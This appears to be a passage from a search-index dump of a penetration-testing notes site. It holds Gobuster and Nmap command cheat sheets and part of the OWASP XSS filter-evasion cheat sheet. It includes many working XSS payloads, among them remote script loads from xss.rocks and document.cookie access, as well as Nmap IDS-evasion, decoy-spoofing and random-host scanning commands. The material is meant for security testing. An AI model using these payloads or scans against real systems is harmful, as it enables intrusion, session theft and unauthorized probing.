", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/", "title": "Gobuster CheatSheet", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#common-gobuster-commands", "title": "Common Gobuster Commands", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dir-mode", "title": "dir Mode", "text": "gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt\n
With content length
gobuster dir -u https://example.com -w ~/wordlists/shortlist.txt -l\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dns-mode", "title": "dns Mode", "text": "gobuster dns -d example.com -t 50 -w common-names.txt\n
gobuster dns -d example.com-w ~/wordlists/subdomains.txt\n
With Show IP
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i\n
Base domain validation warning when the base domain fails to resolve
gobuster dns -d example.com -w ~/wordlists/subdomains.txt -i\n
Wildcard DNS is also detected properly:
gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#vhost-mode", "title": "vhost Mode", "text": "gobuster vhost -u https://example.com -w common-vhosts.txt\n
s3 Mode
gobuster s3 -w bucket-names.txt\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#available-modes", "title": "Available Modes", "text": "Switch Description dir the classic directory brute-forcing mode dns DNS subdomain brute-forcing mode s3 Enumerate open S3 buckets and look for existence and bucket listings vhost irtual host brute-forcing mode (not the same as DNS!)", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#global-flags", "title": "Global Flags", "text": "Short Switch Long Switch Description -z --no-progress Don't display progress -o --output string Output file to write results to (defaults to stdout) -q --quiet Don't print the banner and other noise -t --threads int Number of concurrent threads (default 10) -i --show-ips Show IP addresses --delay duration DNS resolver timeout (default 1s) -v, --verbose Verbose output (errors) -w --wordlist string Path to the wordlist", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dns-mode-options", "title": "DNS Mode Options", "text": "Short Switch Long Switch Description -h, --help help for dns -d, --domain string The target domain -r, --resolver string Use custom DNS server (format server.com or server.com:port) -c, --show-cname Show CNAME records (cannot be used with '-i' option) -i, --show-ips Show IP addresses --timeout duration DNS resolver timeout (default 1s)", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#dir-mode-options", "title": "DIR Mode Options", "text": "Short Switch Long Switch Description -h, --help help for dir -f, --add-slash Append / to each request -c, --cookies string Cookies to use for the requests -e, --expanded Expanded mode, print full URLs -x, --extensions string File extension(s) to search for -r, --follow-redirect 
Follow redirects -H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -l, --include-length Include the length of the body in the output -k, --no-tls-validation Skip TLS certificate verification -n, --no-status Don't print status codes -P, --password string Password for Basic Auth -p, --proxy string Proxy to use for requests [http(s)://host:port] -s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) (default \"200,204,301,302,307,401,403\") -b, --status-codes-blacklist string Negative status codes (will override status-codes if set) --timeout duration HTTP Timeout (default 10s) -u, --url string The target URL -a, --useragent string Set the User-Agent string (default \"gobuster/3.1.0\") -U, --username string Username for Basic Auth -d, --discover-backup Upon finding a file search for backup files --wildcard Force continued operation when wildcard found", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/gobuster-cheatsheet/#vhost-mode-options", "title": "vhost Mode Options", "text": "Short Switch Long Switch Description -h --help help for vhost -c --cookies string Cookies to use for the requests -r --follow-redirect Follow redirects -H --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2' -k --no-tls-validation Skip TLS certificate verification -P --password string Password for Basic Auth -p --proxy string Proxy to use for requests [http(s)://host:port] --timeout duration HTTP Timeout (default 10s) -u --url string The target URL -a --useragent string Set the User-Agent string (default \"gobuster/3.1.0\") -U --username string Username for Basic Auth", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/", "title": "Nmap CheatSheet", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": 
"penetration-testing/cheatsheets/nmap-cheatsheet/#common-nmap-commands", "title": "Common Nmap Commands", "text": "Aggressive scan, single host, TCP SYN, :
nmap -n -sS -p- -T4 -Pn -A -v 192.168.1.1\n
Ping Scan - Host discovery in subnet
nmap -sn -v 192.168.0.0/24\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#target-specification", "title": "Target Specification", "text": "Switch Description Example nmap 192.168.1.1 Scan a single IP nmap 192.168.1.1 192.168.2.1 Scan specific IPs nmap scanme.nmap.org Scan a range nmap scanme.nmap.org Scan a domain nmap 192.168.1.0/24 Scan using CIDR notation -iL nmap -iL targets.txt Scan targets from a file -iR nmap -iR 100 Scan 100 random hosts --exclude nmap --exclude 192.168.1.1 Exclude listed hosts", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#scan-techniques", "title": "Scan Techniques", "text": "Switch Example Description -sS nmap 192.168.1.1 -sS TCP SYN port scan (Default) -sT nmap 192.168.1.1 -sT TCP connect port scan (Default without root privilege) -sU nmap 192.168.1.1 -sU UDP port scan -sA nmap 192.168.1.1 -sA TCP ACK port scan -sW nmap 192.168.1.1 -sW TCP Window port scan -sM nmap 192.168.1.1 -sM TCP Maimon port scan", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#host-discovery", "title": "Host Discovery", "text": "Switch Description Example -sL nmap 192.168.1.1-3 -sL No Scan. List targets only -sn nmap 192.168.1.1/24 -sn Disable port scanning. Host discovery only. -Pn nmap 192.168.1.1-5 -Pn Disable host discovery. Port scan only. 
-PS nmap 192.168.1.1-5 -PS22-25,80 TCP SYN discovery on port x.Port 80 by default -PA nmap 192.168.1.1-5 -PA22-25,80 TCP ACK discovery on port x.Port 80 by default -PU nmap 192.168.1.1-5 -PU53 UDP discovery on port x.Port 40125 by default -PR nmap 192.168.1.1-1/24 -PR ARP discovery on local network -n nmap 192.168.1.1 -n Never do DNS resolution", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#port-specification", "title": "Port Specification", "text": "Switch Description Example -p nmap 192.168.1.1 -p 21 Port scan for port x -p nmap 192.168.1.1 -p 21-100 Port range -p nmap 192.168.1.1 -p U:53,T:21-25,80 Port scan multiple TCP and UDP ports -p nmap 192.168.1.1 -p- Port scan all ports -p nmap 192.168.1.1 -p http,https Port scan from service name -F nmap 192.168.1.1 -F Fast port scan (100 ports) --top-ports nmap 192.168.1.1 --top-ports 2000 Port scan the top x ports -p-65535 nmap 192.168.1.1 -p-65535 Leaving off initial port in range makes the scan start at port 1 -p0- nmap 192.168.1.1 -p0- Leaving off end port in rangemakes the scan go through to port 65535", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#service-and-version-detection", "title": "Service and Version Detection", "text": "Switch Description Example -sV nmap 192.168.1.1 -sV Attempts to determine the version of the service running on port -sV --version-intensity nmap 192.168.1.1 -sV --version-intensity 8 Intensity level 0 to 9. Higher number increases possibility of correctness -sV --version-light nmap 192.168.1.1 -sV --version-light Enable light mode. Lower possibility of correctness. Faster -sV --version-all nmap 192.168.1.1 -sV --version-all Enable intensity level 9. Higher possibility of correctness. 
Slower -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#os-detection", "title": "OS Detection", "text": "Switch Description Example -O nmap 192.168.1.1 -O Remote OS detection using TCP/IP stack fingerprinting -O --osscan-limit nmap 192.168.1.1 -O --osscan-limit If at least one open and one closed TCP port are not found it will not try OS detection against host -O --osscan-guess nmap 192.168.1.1 -O --osscan-guess Makes Nmap guess more aggressively -O --max-os-tries nmap 192.168.1.1 -O --max-os-tries 1 Set the maximum number x of OS detection tries against a target -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#timing-and-performance", "title": "Timing and Performance", "text": "Switch Description Example -T0 nmap 192.168.1.1 -T0 Paranoid (0) Intrusion DetectionSystem evasion -T1 nmap 192.168.1.1 -T1 Sneaky (1) Intrusion Detection Systemevasion -T2 nmap 192.168.1.1 -T2 Polite (2) slows down the scan to useless bandwidth and use less target machine resources -T3 nmap 192.168.1.1 -T3 Normal (3) which is default speed -T4 nmap 192.168.1.1 -T4 Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network -T5 nmap 192.168.1.1 -T5 Insane (5) speeds scan; assumes you are on an extraordinarily fast network -------- -------- ------------------------------------------------------------------------------------------- --host-timeout 1s; 4m; 2h Give up on target after this long --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout 1s; 4m; 2h Specifies probe round trip time --min-hostgroup/max-hostgroup <size 50; 1024 Parallel host scan group sizes --min-parallelism/max-parallelism 10; 1 Probe parallelization 
--scan-delay/--max-scan-delay 20ms; 2s; 4m; 5h Adjust delay between probes --max-retries 3 Specify the maximum number of port scan probe retransmissions --min-rate 100 Send packets no slower than per second --max-rate 100 Send packets no faster than per second", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#nse-scripts", "title": "NSE Scripts", "text": "Switch Description Example -sC nmap 192.168.1.1 -sC Scan with default NSE scripts. Considered useful for discovery and safe --script default nmap 192.168.1.1 --script default Scan with default NSE scripts. Considered useful for discovery and safe --script nmap 192.168.1.1 --script=banner Scan with a single script. Example banner --script nmap 192.168.1.1 --script=http* Scan with a wildcard. Example http --script nmap 192.168.1.1 --script=http,banner Scan with two scripts. Example http and banner --script nmap 192.168.1.1 --script \"not intrusive\" Scan default, but remove intrusive scripts --script-args nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1 NSE script with arguments", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#useful-nse-script-examples", "title": "Useful NSE Script Examples", "text": "Command Description nmap -Pn --script=http-sitemap-generator scanme.nmap.org http site map generator nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 Fast search for random web servers nmap -Pn --script=dns-brute domain.com Brute forces DNS hostnames guessing subdomains nmap -n -Pn -vv -O -sV --script smb-enum,smb-ls,smb-mbenum,smb-os-discovery,smb-s,smb-vuln,smbv2 -vv 192.168.1.1 Safe SMB scripts to run nmap --script whois* domain.com Whois query nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org Detect cross site scripting vulnerabilities nmap -p80 --script http-sql-injection scanme.nmap.org Check for SQL 
injections", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#firewall-ids-evasion-and-spoofing", "title": "Firewall / IDS Evasion and Spoofing", "text": "Switch Description Example -f nmap 192.168.1.1 -f Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters --mtu nmap 192.168.1.1 --mtu 32 Set your own offset size -D nmap -D 192.168.1.101,192.168.1.102, 192.168.1.103,192.168.1.23 192.168.1.1 Send scans from spoofed IPs -D nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip Above example explained -S nmap -S www.microsoft.com www.facebook.com Scan Facebook from Microsoft (-e eth0 -Pn may be required) -g nmap -g 53 192.168.1.1 Use given source port number --proxies nmap --proxies http://192.168.1.1:8080
, http://192.168.1.2:8080
192.168.1.1 Relay connections through HTTP/SOCKS4 proxies --data-length nmap --data-length 200 192.168.1.1 Appends random data to sent packets", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#example-ids-evasion-command", "title": "Example IDS Evasion command", "text": "nmap -f -t 0 -n -Pn \u2013data-length 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#output", "title": "Output", "text": "Switch Description Example -oN nmap 192.168.1.1 -oN normal.file Normal output to the file normal.file -oX nmap 192.168.1.1 -oX xml.file XML output to the file xml.file -oG nmap 192.168.1.1 -oG grep.file Grepable output to the file grep.file -oA nmap 192.168.1.1 -oA results Output in the three major formats at once -oG - nmap 192.168.1.1 -oG - Grepable output to screen. -oN -, -oX - also usable --append-output nmap 192.168.1.1 -oN file.file --append-output Append a scan to a previous scan file -v nmap 192.168.1.1 -v Increase the verbosity level (use -vv or more for greater effect) -d nmap 192.168.1.1 -d Increase debugging level (use -dd or more for greater effect) --reason nmap 192.168.1.1 --reason Display the reason a port is in a particular state, same output as -vv --open nmap 192.168.1.1 --open Only show open (or possibly open) ports --packet-trace nmap 192.168.1.1 -T4 --packet-trace Show all packets sent and received --iflist nmap --iflist Shows the host interfaces and routes --resume nmap --resume results.file Resume a scan", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#helpful-nmap-output-examples", "title": "Helpful Nmap Output examples", "text": "Scan for web servers and grep to show which IPs are running web servers
nmap -p80 -sV -oG - --open 192.168.1.1/24 | grep open\n
Generate a list of the IPs of live hosts
nmap -iR 10 -n -oX out.xml | grep \"Nmap\" | cut -d \" \" -f5 > live-hosts.txt\n
Append IP to the list of live hosts
nmap -iR 10 -n -oX out2.xml | grep \"Nmap\" | cut -d \" \" -f5 >> live-hosts.txt\n
Compare output from nmap using the ndiff
ndiff scanl.xml scan2.xml\n
Convert nmap xml files to html files
xsltproc nmap.xml -o nmap.html\n
Reverse sorted list of how often ports turn up
grep \" open \" results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#miscellaneous-options", "title": "Miscellaneous Options", "text": "Switch Description Example -6 nmap -6 2607:f0d0:1002:51::4 Enable IPv6 scanning -h nmap -h nmap help screen", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/nmap-cheatsheet/#other-useful-nmap-commands", "title": "Other Useful Nmap Commands", "text": "Discovery only on ports x, no port scan
nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn\n
Arp discovery only on local network, no port scan
nmap 192.168.1.1-1/24 -PR -sn -vv\n
Traceroute to random targets, no port scan
nmap -iR 10 -sn -traceroute\n
Query the Internal DNS for hosts, list targets only
nmap 192.168.1.1-50 -sL --dns-server 192.168.1.1\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/", "title": "XSS CheatSheet", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#introduction", "title": "Introduction", "text": "This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing. The initial contents of this article were donated to OWASP by RSnake, from his seminal XSS CheatSheet, which was at: http://ha.ckers.org/xss.html
. That site now redirects to its new home here, where we plan to maintain and enhance it. The very first OWASP Prevention CheatSheet, the Cross Site Scripting Prevention CheatSheet, was inspired by RSnake's XSS CheatSheet, so we can thank RSnake for our inspiration. We wanted to create short, simple guidelines that developers could follow to prevent XSS, rather than simply telling developers to build apps that could protect against all the fancy tricks specified in rather complex attack CheatSheet, and so the OWASP CheatSheet Series was born.
This CheatSheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate.
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#basic-xss-test-without-filter-evasion", "title": "Basic XSS Test Without Filter Evasion", "text": "This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xss-locator-polygot", "title": "XSS Locator (Polygot)", "text": "The following is a \"polygot test XSS payload.\" This test will execute in multiple contexts including html, script string, js and url. Thank you to Gareth Heyes for this contribution.
`javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#image-xss-using-the-javascript-directive", "title": "Image XSS Using the JavaScript Directive", "text": "Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well:
<img src=\"javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#no-quotes-and-no-semicolon", "title": "No Quotes and no Semicolon", "text": "<IMG SRC=javascript:alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#case-insensitive-xss-attack-vector", "title": "Case Insensitive XSS Attack Vector", "text": "<IMG SRC=JaVaScRiPt:alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#html-entities", "title": "HTML Entities", "text": "The semicolons are required for this to work:
<img src='javascript:alert(\"XSS\")' />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#grave-accent-obfuscation", "title": "Grave Accent Obfuscation", "text": "If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents:
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#malformed-a-tags", "title": "Malformed A Tags", "text": "Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome
`\\<a onmouseover=\"alert(document.cookie)\"\\>xxs link\\</a\\>\n
or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.
`\\<a onmouseover=alert(document.cookie)\\>xxs link\\</a\\>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#malformed-img-tags", "title": "Malformed IMG Tags", "text": "Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tags:
<IMG \"\"\">\n<script>\nalert('XSS');\n</script>\n\"\\>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#fromcharcode", "title": "fromCharCode", "text": "If no quotes of any kind are allowed you can eval()
a fromCharCode
in JavaScript to create any XSS vector you need:
<img src=\"javascript:alert(String.fromCharCode(88,83,83))\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#default-src-tag-to-get-past-filters-that-check-src-domain", "title": "Default SRC Tag to Get Past Filters that Check SRC Domain", "text": "This will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur
, onclick
giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .
<img src=\"#\" onmouseover=\"alert('xxs')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#default-src-tag-by-leaving-it-empty", "title": "Default SRC Tag by Leaving it Empty", "text": "<img src=\"onmouseover\" =\"alert('xxs')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#default-src-tag-by-leaving-it-out-entirely", "title": "Default SRC Tag by Leaving it out Entirely", "text": "<img onmouseover=\"alert('xxs')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#on-error-alert", "title": "On Error Alert", "text": "<IMG SRC=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-onerror-and-javascript-alert-encode", "title": "IMG onerror and JavaScript Alert Encode", "text": "<img src=x onerror=\"javascript:alert('XSS')\">\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#decimal-html-character-references", "title": "Decimal HTML Character References", "text": "All of the XSS examples that use a javascript: directive inside of an <IMG
tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).
<img\n src=\"javascript:alert('XSS')\"\n/>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#decimal-html-character-references-without-trailing-semicolons", "title": "Decimal HTML Character References Without Trailing Semicolons", "text": "This is often effective in XSS that attempts to look for \"&#XX;\", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against strings like \\(tmp_string =\\~ s/.\\*\\\\&\\#(\\\\d+);.\\*/\\)1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):
<img\n src=\"javascript:alert('XSS')\"\n/>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#hexadecimal-html-character-references-without-trailing-semicolons", "title": "Hexadecimal HTML Character References Without Trailing Semicolons", "text": "This is also a viable XSS attack against the above string \\(tmp_string=\\~ s/.\\*\\\\&\\#(\\\\d+);.\\*/\\)1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).
<img\n src=\"javascript:alert('XSS')\"\n/>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-tab", "title": "Embedded Tab", "text": "Used to break up the cross site scripting attack:
<img src=\"jav ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-encoded-tab", "title": "Embedded Encoded Tab", "text": "Use this one to break up XSS :
<img src=\"jav	ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-newline-to-break-up-xss", "title": "Embedded Newline to Break-up XSS", "text": "Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this vector:
<img src=\"jav
ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embedded-carriage-return-to-break-up-xss", "title": "Embedded Carriage Return to Break-up XSS", "text": "(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):
<img src=\"jav
ascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#null-breaks-up-javascript-directive", "title": "Null breaks up JavaScript Directive", "text": "Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00
in the URL string or if you want to write your own injection tool you can either use vim (^V^@
will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00
is much more useful and helped me bypass certain real world filters with a variation on this example:
`perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#spaces-and-meta-chars-before-the-javascript-in-images-for-xss", "title": "Spaces and Meta Chars Before the JavaScript in Images for XSS", "text": "This is useful if the pattern match doesn't take into account spaces in the word javascript:
-which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the javascript:
keyword. The actual reality is you can have any char from 1-32 in decimal:
<img src=\"  javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#non-alpha-non-digit-xss", "title": "Non-alpha-non-digit XSS", "text": "The Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example \\<SCRIPT\\\\s
!= \\<SCRIPT/XSS\\\\s
:
<SCRIPT/XSS SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n
Based on the same idea as above, however, expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:
<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n
Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.
<SCRIPT/SRC=\"http://xss.rocks/xss.js\"></SCRIPT>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#extraneous-open-brackets", "title": "Extraneous Open Brackets", "text": "Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error:
<\n<script>\nalert('XSS'); //\\<\n</script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#no-closing-script-tags", "title": "No Closing Script Tags", "text": "In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the \\></SCRIPT>
portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:
<SCRIPT SRC=http://xss.rocks/xss.js?< B >\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#protocol-resolution-in-script-tags", "title": "Protocol Resolution in Script Tags", "text": "This particular variant was submitted by \u0141ukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT>
tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The \".j\" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.
<SCRIPT SRC=//xss.rocks/.j>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#half-open-htmljavascript-xss-vector", "title": "Half Open HTML/JavaScript XSS Vector", "text": "Unlike Firefox the IE rendering engine doesn't add extra data to you page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close \">\" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\\\\%3D)|(=))\\[^\\\\n\\]\\*((\\\\%3C)|\\<)\\[^\\\\n\\]+((\\\\%3E)|\\>)/
because it doesn't require the end \">\". As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME
tag instead of an <IMG
tag:
<IMG SRC=\"`<javascript:alert>`('XSS')\"`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#double-open-angle-brackets", "title": "Double Open Angle Brackets", "text": "Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:
<iframe src=http://xss.rocks/scriptlet.html <`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#escaping-javascript-escapes", "title": "Escaping JavaScript Escapes", "text": "When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a=\"$ENV{QUERY\\_STRING}\";</SCRIPT>
